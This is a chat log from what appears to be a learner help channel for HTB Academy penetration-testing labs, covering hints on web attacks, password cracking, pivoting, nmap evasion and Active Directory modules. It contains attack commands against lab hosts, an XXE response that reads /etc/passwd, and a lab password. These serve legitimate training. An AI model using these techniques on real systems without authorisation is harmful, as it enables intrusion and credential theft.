[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:135 ... OK
SMB 172.16.6.50 445 NONE [*] x64 (name:) (domain:) (signing:False) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
SMB 172.16.6.50 445 NONE [-] Connection Error: Error while reading from remote
Hi everyone
linux file transfer module task1
Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
should i use request lib to download (passed with wget itself) however cant get requirements of task
other times all i get is
sudo proxychains crackmapexec smb 172.16.6.50 -u svc_sql -p 'xxxxx'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
then it dies
How do I fix this error
Perhaps nothing is running locally on 8080?
Hello guys, I'm stuck on Tier 1 of the "Learn the basics of Penetration Testing" - Responder... I can't run the Responder.py bc the port 80 is already running the python from the PWNBox.. if I kill the process the Pwnbox close itself.
It's ok I just opened the solution
For hint I feel ashamed
I'm beyond cooked
hello
I am struggling to solve Advanced File Disclosure
module Web Attacks, can anyone help me ?
Lowercase p for port
can anyone help me ?
HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 11:21:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Check your email for further instructions.
Password Reuse / Default Passwords
Found a zipped folder on the host, does this require cracking? Not sure if I'm running down a rabbit hole or not - please @ with any responses thanks
can anyone help me with the request on Burp Suite to get the flag ?
yeeaaa, im stuck on easy SOMEHOW, gonna reread whole module hahah
HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 12:33:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1141
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Warning</b>: DOMDocument::loadXML(): internal error: xmlParseInternalSubset: error detected in Markup declaration in file:///etc/passwd, line: 1 in <b>/var/www/html/error/submitDetails.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>: DOMDocument::loadXML(): Entity 'file' not defined in Entity, line: 5 in <b>/var/www/html/error/submitDetails.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>: simplexml_import_dom(): Invalid Nodetype to import in <b>/var/www/html/error/submitDetails.php</b> on line <b>12</b><br />
<br />
<b>Notice</b>: Trying to get property 'name' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>13</b><br />
<br />
<b>Notice</b>: Trying to get property 'tel' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>14</b><br />
<br />
<b>Notice</b>: Trying to get property 'email' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>15</b><br />
<br />
<b>Notice</b>: Trying to get property 'message' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>16</b><br />
Check your email for further instructions.
I am still stuck here, isn't there anyone to help?
I usually just open the cheatsheet which also acts as a sort of refresher for me
@nimble scroll feel free to dm me what you got
is it okay if i use chatgpt to explain the displayed information i get from the nmap scan? like what these means:
Service scan sending probe DNSVersionBindReq to 10.129.2.48:53 (udp)
NSOCK INFO [2.2950s] nsock_write(): Write request for 30 bytes to IOD #1 EID 19 [10.129.2.48:53]
NSOCK INFO [2.2950s] nsock_read(): Read request from IOD #1 [10.129.2.48:53] (timeout: 5000ms) EID 26
I may just be being rrly dumb here. I've just started, and am on linux fundamentals.
Q: "What is the index number of the "sudoers" file in the "/etc" directory?" I put in the command ls -i /etc/, and found the sudoers file, put in the number next to it, it's saying it's wrong
Are you ssh to the target?
right, yep, i was being dumb, thankyou!
Rabbit hole, the question tells you where to look
Module: ADCS Attacks
Section: PKINIT
When i obtain administrator certificate by exploiting esc1, extracting public key from certificate gives me an empty .crt file, but extracting private key works fine.
Module is above tier 0, please remove screenshot
If you want to suggest a fix or error in the module #1234357888114364508 <--
Sorry, didnt know that my screenshot can be a spoiler 😄
When erratum is added?
It contains content from the lab environment, so yes it's a spoiler
Wdym the channel? Its been there forever
Lol, I never opened it.
if I remove private key content, will I be able to add screenshot then?
Yeah; #1234357888114364508 is more lenient but you can spoiler the image
Got it will try again, thanks
If you still run into issues, feel free to DM and I can see if it is something command related.
Can anyone give me a work
I need to earn
This isn't a 4hire server read and follow #welcome
- How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.
- How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234.
please help me on this, waybackmachine doesn't work !
Module: Information Gathering - Web Edition
What exactly do you mean by “waybackmachine doesn't work”?
The website is working.
i answer all the Questions and waybackmachine work until this two questions he don't give me the pages
HTB used a different ||top-level domain|| in the past.
i used this hackthebox.com
Read my hint again. ||com is not correct.||
how i can know the top-level domains HTB have used in the past ?
whois cmd ?
think what relative region that hackthebox resides in ||(They were founded, and main HQ is still, in Greece, which is part of...)||
Surf through old versions of the website, which you can find on WayBackMachine. Take a look at the links.
i solve it, thanks very much
Hey guys! I'm doing the web attacks module. CURL is not working for me. When I run "curl -i -X OPTIONS http://SERVER_IP:PORT/" it should print me the allowed methods like in the guide. However, it doesn't work for me for some reason...? Does anyone know how to fix this issue?
First picture is what I get,
The second is what should happen:
examples won't always match up to what you do; though you can chuck it in #1234357888114364508 that the target should respond to the -X OPTIONS request
Alright, thanks!
Quick question : during assessments, is it common to look into the /opt/scripts directory ?
i mean if it exists it's not a bad place to look
@signal hound your screenshot contains spoilers for a password redact it and reupload the image
Hi im doing AD enumeration and attacks
I am trying to rdp to MS01
I tried using metasploit
And netsh to portforward but i get errors when im trying to rdp
When i use /cert-ignore i get "timeout waiting for activation"
I guess so yeah, but I didn't know it could be THAT pertinent. What are the things you'd check as a "reflex" when having a foothold ? Other than SUID files, capabilities, Path, Cron, Systemd.. ?
on htb machines always sudo -l and 90% of the time you get the tool needed for escalation right there lol
Try adding a /timeout so like this: xfreerdp /v:172.16.6.35 /u:'inlanefreight.local\james' /p:'mypassword' /dynamic-resolution /timeout:30000
You can also try another tool like rdesktop and remmina
Also that accounts a service sql account, so make sure it has rdp privileges, if not try connecting to mssql with mssqlclient.py
That was my first idea as well x) but it didn't work in that case 👀
Anyone available for a hand on the RDLL Injection - Implementation Question 2 (Process Injection Attacks and Detection). Been stuck on this for most of the day. Cant figure out where im going wrong. Thank you.
Hi, guys. I can't understand why any search bar or form of the final skill assessment of the sqlmap module is sending a request to the web app's back-end
Hi,
I'm trying to get the OS name from the target in Firewall and IDS/IPS Evasion - Easy Lab, here's what I did:
sudo nmap <target_ip>/24 -sn -oA host -PE --reason to get the neighbors IPs
then
sudo nmap <target_ip> -p<port> -n -Pn -O -S <ip_from_the_above> -e tun0
and here I get the error:
setup_target: failed to determine route to 10.129.2.80
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.09 seconds
am I doing smth wrong?
are you trying to work out the OS, or the hostname of the system ?
See if this works :D. ping -c 1 <target-ip>, if you can get the ttl (time to live) if its 128 its likely windows, if its 64 its linux
so you're blocked from sending icmp (pings)
You're doing far too much here
try scanning with -Pn
sudo nmap 10.129.2.80 -p80 -sS -O -Pn -n --disable-arp-ping --source-port 53 did this too
-S also doesn't do what I think you think it's doing.
but the answer is incorrect
Also i believe it's just asking the base OS not full flavor
its setting source IP, right?
I'm giving base OS as the answer and its incorrect haha
can I send the SS in priv? cuz I guess I can't send it here cuz its the result of a scan
@fathom pendant
try -T 0? 😄 and ss is a syn scan
Why would you set the source as the target and expect a response?
You're likely overthinking it
Normally I wouldn't but if i find it in your screenshot you owe me a beer
it was an example in the module 😭
Not everything in the examples will be doable
There's reading surrounding the examples that give them more context
--dns-server <ns> try specify their dns, just spit balling ideas
try some of these, -PS443, -PA80, -PA443, -PS80
-PE -PS80 -PS443 -PP -PU40125 -PS3389 -PA21 -PU161 --source-port 53 this one is a beast of a command also
that's doing WAY too much work
the module this is from doesn't touch on half of what you put there
try SECLISTS http-request-methods.txt and just run through each one in intruder
Intruder do be slow though(on free burp at least), probably grab a plugin instead
if you've not got burp pro, id just use ffuf
Hey, guys. I'm brand new to HTB but not to wi-fi hacking. I'm doing the WPS Reconnaissance module. When I open up the target system, there is no wlan0 interface. Any advice would be appreciated.
cant go too far with wi-fi hacking without a wlan interface 😉
by "open up" do you mean ssh or rdp in? because the pwnbox != the target;
Spawn Instance != Spawn Target
I can spawn the instance and have access to the environment.
Spawning instance spawns the pwnbox, not the target that would have the wlan0 interface
:)
ya, im brand new...thanks
there should be instructions above the question that state <ssh|rdp> to <ip> with username "something" and password "something"
but I have been performing wi-fi pen test for 6 years
ok?
checking...
i'm telling you how the targets and questions work on htb academy
yes. thank you
spawn target spawns the actual lab that would have the required stuff to do
since you can utilize your own machine/vm to connect to the labs
Just rechecking in seeing if anyone would be available for a hand with Reflected DLL Implementation, question 2. I have located the LoadLibraryA() in both IDA and x64dbg. cannot find the hash to save my life. Could use a nudge.
thank you....this is where I am at.
you can't share images because your account isn't linked
I missed this part 😓
a lot of it is explained in the INtro to Academy module 😉
yaa...lol I'll do that (the Intro to Academy Module). thank you
should have been the first thing loaded up when you created your academy account
cannot login with provided credentials on https://academy.hackthebox.com/module/147/section/1639
xfreerdp /v:10.129.175.164 /u:Administrator /p:AnotherC0mpl3xP4$$
[18:03:43:170] [6235:6236] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:03:43:170] [6235:6236] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[18:03:43:371] [6235:6236] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:03:43:371] [6235:6236] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:03:43:371] [6235:6236] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA -
Put your password in single quotes.
wrap password in single quotes
if you're curious why echo AnotherC0mpl3xp4$$ and see what it outputs, that's what bash is seeing as the pw
Thank you @fathom pendant , i also needed to add the /sec:tls that was throwing the error
well the main issue here is > STATUS_LOGON_FAILURE
meaning that no matter what it's not logging in with invalid creds
if you have invalid creds you get a RDP session and it shows the error on the new screen saying invalid credentials if you got the IP and username right. In this case the second screen did not open at all, and yes it needed to be inside single quotes
not with xfreerdp
can i upload images here?
xfreerdp throws the error without setting up the rdp session with invalid creds
maybe rdesktop or other tools do that
could i share pictures here?
yes
okay
since it wouldn't contain a spoiler
literally as long as it doesn't spoil the module (contain creds that you had to hunt for or other things you had to search for) you're fine
yeah, thank you for the response ❤️
i don't think i've ever used the /sec:tls option
also you don't wrap '/p:password' it's just /p:'password'
just as a standard use
it works both ways
i'm aware
just informing standard use case just in case the tool gets an update and that no longer becomes valid syntax
hello lads can anyone help im doing the right thing maybe im using the wrong list
??
You cracked kiras password in the credential hunting linux section
not kira the zip file homie
I used rockyou
Mutated wordlist will crack it from what i recall
same didnt work
try the provided word lists
Make sure the 2john tool didn't output an empty line/string
this is the only thing I hate about this module (actively doing hard lab rn), is that it is mostly guessing and waiting
what word list did you use for it
am using the mutated one
you just said rockyou tho
ohh you mean for the zip file? yeah I used rockyou, I thought you mean for the hard lab

good luck homie
[STATUS] 63.33 tries/min, 190 tries in 00:03h, 93856 to do in 24:42h, 2 active
long wait to go 
can i send you an ss and tell me what im doing wrong??
?
damn
just try cracking it with any of the wordlists provided
cos I do have a few different versions of rockyou
~~made a mutated one just for the fun of it~~
LOL
did you transfer the zipped file to your machine?
or did you unhash it on kira @waxen totem
transfer to my machine
same
can you send me the wordlist you used please
you would be a fucking champ man
I DID FAM
try the other wordlists
I DID
if it ain't working don't force it
shouldn't take more than 1 min to crack ngl
took mine 2 seconds
im using my own machine
is the hashfile empty?
a long way to do this on pwn
nope its the word lists fault can i send you an ss?
no
lol
fair enough
have you tried the mutated wordlist?
i just did thank you
Yoo quick question about the Password Attacks Hard Lab, I found a massive file, am I supposed to transfer this over to my machine? 
depends on the file but typically: yes
question when using hydra for ftp attacks, I swear I read -t 48 was recommended for speeding up the process
that was like the max
or maybe 46
ahh yea has to 46 I see the time short now
nvm
Some protocols might be faster also
maybe 64
[STATUS] 256.00 tries/min, 256 tries in 00:01h, 93788 to do in 06:07h, 16 active
How do I keep the windows machines from blowing up on me in the password section. I tried opening a notepad file and the RDP blew up and i gotta restart the server
so that is the default I guess 16
Yeah default is 16
[STATUS] 864.00 tries/min, 864 tries in 00:01h, 93194 to do in 01:48h, 50 active
nice so I set it to 64 I guess it went to 50
otherwise this module is going to take 5 hours lol
For Case6 on Attack tuning - SQLMap essentials; is the command supposed to take a long time?
Can I post the command I’m using?
sigh went from my rdp constantly crashing on the windows machines to just Destination Host Unreachable - switching from UDP vpn to TCP solved my RDP issues
@fleet moth no spoilers from modules please
How am I supposed to share my concerns@cloud urchin ? Besides I haven't mentioned anything that is not to be found on the HTB forum.
You can simply ask without posting content from the module as it's above tier 0
if you need to go deeper with info then you can ask if someone will DM
Lul
hi guys
I asked in general where to ask for help in my linux lab question problem and i was referred to this chat
anyway
Im in linux lab and idk why is this answer wrong, i even tried losing the / at the beginning and still wrong, i double checked with "echo $HOME" and "cat /etc/passwd | grep home" to double check my home dir and idk why its still wrong, tried diff browser, refreshing and still nothing, any help?
Are you sshd into the target?
if by that you mean im using the virtual machine web thingy that they offer then yes
forgive my ignorance, im new
only replying in case you're not in the chat atm
No i mean you have to spawn the target and ssh into the target
I clicked on the spawn button, then interact, now im in a new tab, with the linux machine and terminal open
That's different that's the pwnbox, not the target
Look just slightly above the question
Please don't post answers for the challenges guys
oh
Yeah mb didn't realize there was one of the answers in it 
the ssh thing wasnt covered
Yeah which is why I sent a link to ssh cheatsheet
do i spawn my virtual box kali and use its terminal ?
or use it from whithin the web one that htb offers
omg, is that like connecting as a different user ???
You'd have to use the VPN to it but you can
All you need to know about the VPN Connection for Academy
they offered some vpn file to download, but again im kind of skeptical and also ignorant when it comes to this, idk why they didnt cover it first
I'll read it
Heck it's preferred to use the vpn
alright I'll read it for now and use the cheatsheet u provided
A VPN is essentially a network with your computer and the target in it
thanks so much @waxen totem
No ping ples 
hey there, to ssh, i need to know the name@ip, they only provided me with a name and password
Did you spawn the target? 👀
It will give you an ip
i feel so stupid lol
thanks man, already done this and im in and solved it
but there is this question
i used ls in my home dir and there was nothing, kept spoofing around and this was the only mail thing i found, im confused
hello
im on the information gathering web edition and im on the way back machine thing but for some reason this keeps popping up when i check htb 2018 aug 8
Might wanna, check EVERYTHING, you were told to
what i do
That's because Hack the box wasn't hackthebox.com in 2018
oh what was it
know your target 👀
that's for you to figure it out
Hi, I have a question I was practicing with ligolo and I established a connection with double pivot but when I try to start second tunnel it showed me this error:
error: a tunnel is already using this interface name. Please use a different name using the --tun option
If anyone could help me with why and how to resolve this issue. Much appreciated
https://docs.ligolo.ng/sample/basic/
This shows how to add another interface, route, and tunnel
Thank you, I appreciate it
Is there any cases where ligolo is restricted or blocked to pivot in a network?
In HTB not that I'm aware of. Company engagements possibly.
oh okaay, so this tool doesnt support like dns or icmp tunneling?
You can treat it like a normal network route.
if internal network is monitored, what protocol is used by ligolo's inbound traffic?
Ligolo works by establishing an HTTP tunnel
Although generally works as if its an actual interface
Similar to virtual interfaces on your vm
niiice its stealthy by design I like it
Within limits but ye
Im doing network foundations course and im stuck on the last questions. I dont want the answer i want to be pointed in the correct direction. The question is "Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. ". So when I use nmap to search for the ports of the target ip it gives me port 21 and 80 but they are both closed. I then try and use netcat to create a connection but it says connection refused. How do I get around this ? Please assist, been on this for the last few days.
For Windows Attack and Defense : Skills Assessment, I had finished the Attack, however when I am in Bob in a windows machine, I cannot find the 4886 and 4887 events in event viewer am I missing something
[Skill Assessment - Pivoting | SSH usepam error] Hello everyone! When I attempt to perform a ssh dynamic port forwarding on the server, I get ssh_config usepam and unsupported error. I have reviewed the Solution and also checked the forums, but it seems like no one has encountered this error before. Thank you in advance for your help!
Command: ssh -D 9050 -i id_rsa webadmin@10.129.59.85
Response:
<badmin$ ssh -D 9050 -i id_rsa webadmin@10.129.59.85
/etc/ssh/ssh_config: line 25: Bad configuration option: usepam
/etc/ssh/ssh_config line 27: Unsupported option "rsaauthentication"
/etc/ssh/ssh_config: terminating, 1 bad configuration options
Try to use what you learned in this section to obtain RCE via log poisoning and submit the flag. You can access the log at /log.php. I'm stuck on this question at http attacks
I have figured it out. I should use the ssh command on the attack box and not on the intermediary box itself.
@ancient idol not the place and not the server, please familiarize yourself with the #rules
is there a way to search for information\keywords in the owned modules like a search engine? if not, is it possible to be implemented if i requested it from HTB Academy?
I'm stuck on the first question in the http attacks module “ Try to use what you learned in this section to obtain RCE via log poisoning and submit the flag. You can access the log at /log.php” how to pass the filtering.
help pls
cwee and cape courses will be in the future included in students billing?🥺
no
as those are advanced certs
you get a hell of a deal with access to the basic certs/t2 and below modules
@rustic sage feel free to dm
Kerberos Attacks Skill assessment last question, could use some help...
on htb academy ?
yes
why does eternal blue never work, any time it comes up in a module the payload works but shell never gets completed
This is for the shells & payloads module for the pentester pathway
what module; did you set the options properly
for a shell you need to set the lhost to tun0
ive just restarted my VM, i will try again
should i install htb parrot os edition as default os no problem ?
also do u know any better way of being able to RDP without being blocked in view (unable to see taskbar) when using the pwnbox. -Dynamic-resolution seems to work sometimes, but not always
after it loads up i adjust the size a bit
also /dynamic-resolution is what i use not -Dynamic-resolution
oh
you're on the skill assessment
yeah no you need to set it to the interface that matches the target subnet
yeah i had the foothold IP used originally
also failed to bind
seems like something may have been using that port
is that the tiny window in the academy page? not the fullscreen page?
they both give the same view 🤣
meh i prefer still using the fullscreen option for pwnbox when i use it
but yeah the foothold doesn't have dynamic resolution
ill set the LHOST correctly
Hi quick question
When interacting with active directory
do i have to specify the name of the domain?
For example for a user when i RDP into a computer
'Xfreerdp /v:IP /u:DOMAIN/USER'
Or runas /DOMAIN\user
Or i can use these commands without the domain name?
don't see how it would make it impossible to get back to your own machine
typically yes you would specify domain
if it's a domain user and not local user
because using the -f command when RDPing, gives u a fullscreen of the RDP. so unless u close the RDP, u are unable to switch back
i don't bother with -f
ive tried ctrl + alt + delete and all the other alternatives
i only used it for this assessment since i cant see what im typing
all other modules seemed fine
ctrl-alt-enter
yeah i tried that one also
its all good, i dont think future labs will have the same issue
but i've genuinely never had issues with not seeing what i'm typing on this module/section
failed to bind
try a different lport?
Yeah, but the port is not being used
or try running msfconsole with sudo if you weren't already?
Will it fail if i dont use the domain name?
it can yes
Im trying port 1234 now,
ok same issue, ill try sudo metasploit. but all other exploits work fine. I think eternalblue just hates me
it's likely having permission issues binding to the interface itself
(i'd also make sure that's the right ip)
deleting screenshots as module is above tier 0 btw
:p
yeah no worries, IPs are correct as i checked "show solution" and they used the same IP
yeah it is always "failed to bind", Ill try another vpn region
for the exam, do people use the pwnbox or their own vm? or is it like a split
I have the access to the ||server01|| and from there when i'm trying to ||coerce the auth for dc01||, it's not working.. anyone faced this issue ?
yes
in the Pentest in a Nutshell module there is a question where we have to retrieve the version of vsftpd but vsftpd isn't installed on the target... Am I missing something?
rip EU, im moving to NA
not sure if anyone else gets the error with eternal blue in the future. If ur using this region. Change it to US
Not sure if i should contact support about why my EU region is broken
stuck on nmap idp/ids hard assessment
yeah it is a little hard
u have to mess with a lot of the settings
the question's asking the version of service running and all i see is apache and openssh
knowing that it's a hard one
dont feel scared to use walkthrough or chatgpt
lemme check for u
but the question/hint at top says the administrator held a session or smtg for all and smtg....smtg...
which lab is this
nmap module
